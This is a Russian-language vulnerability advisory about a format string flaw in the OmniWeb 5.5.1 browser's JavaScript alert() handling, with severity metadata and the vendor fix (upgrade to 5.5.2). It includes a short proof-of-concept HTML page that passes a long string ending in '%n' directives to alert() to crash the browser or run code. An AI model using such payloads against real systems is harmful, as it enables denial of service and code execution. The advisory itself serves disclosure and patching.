Уязвимость форматной строки в браузере OmniWeb

Дата публикации:
09.01.2007
Дата изменения:
27.01.2008
Всего просмотров:
3199
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
OmniWeb 5.x
Уязвимые версии: OmniWeb 5.5.1 (v607.5) на Mac OS X 10.4.8

Описание:
Уязвимость позволяет удавленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.

Уязвимость форматной строки обнаружена при обработке Javascript функции "alert()". Удаленный пользователь может с помощью специально сформированной Web страницы выполнить произвольный код на целевой системе. Пример:

<html>
<head>
<title>MOAB-07-01-2007</title>
<script>
/* LMH */
function boom() {
var str = 'A';
while (str.length <= 32) str+=str;
str = str + '%n%n%n%n%n%n';
alert(str);
}
</script>
</head>
<body>
<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
</body>
</html>

URL производителя: www.omnigroup.com/applications/omniweb/

Решение: Установите последнюю версию (5.5.2) с сайта производителя.

Ссылки: MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability

или введите имя

CAPTCHA